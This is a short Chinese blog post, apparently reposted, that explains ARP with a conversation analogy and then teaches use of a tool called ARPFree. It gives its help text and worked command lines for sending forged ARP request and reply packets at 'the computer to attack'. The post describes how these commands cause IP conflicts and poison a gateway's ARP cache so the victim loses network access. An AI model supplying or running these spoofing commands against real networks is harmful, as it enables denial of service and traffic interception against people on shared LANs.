首先,使用此工具前必须对ARP的原理清楚,ARP对话就像我们人之间的对话:首先A计算机刚接入网络,它向所有电脑大喊一声,我的MAC地址是XX-XX-XX-XX-XX-XX,IP地址是192.168.X.X,请问你们的IP和MAC分别是什么?B计算机听到以后就记下了A计算机的MAC和IP,然后告诉A计算机,我的MAC地址是XX-XX-XX-XX-XX-XX,IP地址是192.168.X.X,到此为止,A计算机已经能和B计算机正常通信了。
其实这段通话是通过ARP包来实现的,ARPFree可以完美发送ARP包,下面是ARPFree的帮助内容:
************************************************************************ (1)Send arp packet in "request mode" Examples: ** arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast ** | | | | | ** your mac address | | | | ** destination mac | | speed ** arp type | ** | ** your ip address ************************************************************************* (2)Send arp packet in "reply mode" Examples: ** arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto ** | | | | | | ** your mac address | | | | | ** destination mac | | | speed ** arp type | | ** | | ** your ip address | ** | ** the ip address of destination mac************************************************************************
(1)发送ARP请求包。
格式:arpfree 任意MAC地址 FFFFFFFFFFFF request 要攻击的计算机IP地址 速度
如:arpfree 123412341234 FFFFFFFFFFFF request 192.168.1.10 hear
这条命令能产生的效果:
1.192.168.1.10收到此消息以后认为网络中已经存在IP地址为192.168.1.10的计算机,所以报IP冲突。
2.网关收到此消息以后记下此IP和MAC,这将直接导致192.168.1.10断开外网。
(2)发送ARP答复包。
ARP答复包因为必须为单播,所以只有一台计算机能收到你的答复,一般用于欺骗网关。
格式:arpfree 任意MAC地址 网关MAC地址 reply 要攻击的计算机IP地址 网关IP地址 速度
例如:arpfree 123412341234 001d0f11bea0 reply 192.168.1.10 192.168.1.1 hear
这条命令的效果:
网关会以为这是192.168.1.10回复的ARP信息,所以会保存下192.168.1.10的MAC地址为12-34-12-34-12-34,所以这时192.168.1.10已经断网了.
上面的原文:http://ds061.blog.163.com/blog/static/23718656201042812150942/